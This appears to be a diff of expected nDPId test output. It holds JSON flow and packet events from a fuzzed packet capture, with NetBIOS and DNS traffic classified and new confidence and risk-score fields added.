-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00709{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470657808,"flow_last_seen":1120470666317,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00816{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470657808,"flow_last_seen":1120470666317,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1120470764674,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120470764674,"pkt":"ADBUADRWQODtAW69CABFAAA+a48AAIARS8zAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlLQhzaXBwc3RhcgNjb20AAAEAAQ=="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"re-.sippstar.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"re-.sippstar.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1120470765675,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120470765675,"pkt":"AEtUADRWAODtAW69CABFAAA+a5AAAIARS8vAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXC6c3RhcgNjb20AAAEAAQ=="}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470764674,"flow_last_seen":1120470765675,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470765675,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sip?star.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470764674,"flow_last_seen":1120470765675,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470765675,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sip?star.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00394{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"ts_msec":1120470767678,"pkt":"ADBUADRWAODtAW69CABFAAA+a5EABGQRS8rAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXBwc3RhcgNjb20AAAEAAQ=="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1120470768028,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"ts_msec":1120470768028,"pkt":"AODtAW69ADBUADRWCABFAACbAABAAGcRtv7AqAEBwKgBAgA1CukAh65F6OyBgAABAAEAAgACA3JlZwhzaXBwc3RhcgNjb20AAAEAAcAMAAEAAQAAAlgABFJi0SfAEAACAAEAAAJYAA8CbnMGaHNwZWVkA25ldADAEAACAAEAAAJYAAYDbnMzwEHAPgABAAEAAAUPAAQ+XcA7wFkAAQABAAAFDwAE1d1SAg=="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1120470768028,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sippstar.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.98.209.39"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1120470768028,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sippstar.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.98.209.39"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1120470774132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120470774132,"pkt":"ADBUADRWAODtAW69CABFAAA+a5IAAIARS8nAqAECwKhsAQrqADUAKnjTXO4BAAABAAAAAHEAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1120469540839,"flow_last_seen":1120470733830,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2742,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1120469540839,"flow_last_seen":1120470733830,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2742,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775049,"flow_last_seen":1120470775049,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1120470775049,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120470775049,"pkt":"ADBUADRWAODtAW69CABFAAA+a5MAAIARfcjAqAECwKgBAQrrADUAKvLQ4u8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775049,"flow_last_seen":1120470775049,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775049,"flow_last_seen":1120470775049,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775129,"flow_last_seen":1120470775129,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470775129,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1120470775129,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120470775129,"pkt":"ADBUADRWAODtAW69CABFAAA+a5QAAIARS1jAqAECwKgBAQrqADUAKnjTXO4BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775129,"flow_last_seen":1120470775129,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470775129,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775129,"flow_last_seen":1120470775129,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470775129,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1120470776050,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120470776050,"pkt":"ADBUADRWAODtAW69CABFAAA+a20AAIARS8bAqAECwKgBAQrrADUAKvLQ4u8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1120470777132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120470777132,"pkt":"ADBUADRWAODtAW69CABFAAA+a5YAAIARS8XAqAECwKgBAQrqADUAKnjTXO4BAAABAAAAAAAQA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1120470778053,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120470778053,"pkt":"ADBUADRWAODtAW69CABFAAA+a5cAAIARS8TAqAECwKgBAQrrADUAKvLQ4m8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
 00394{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"ts_msec":1120470779135,"pkt":"ADBUADRWAODtAW69CABFAAA+ayVzAIARS8PAqAECwKgBAQrqADUAKnjTXO4BAAABAAAABAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":503,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120470779408,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
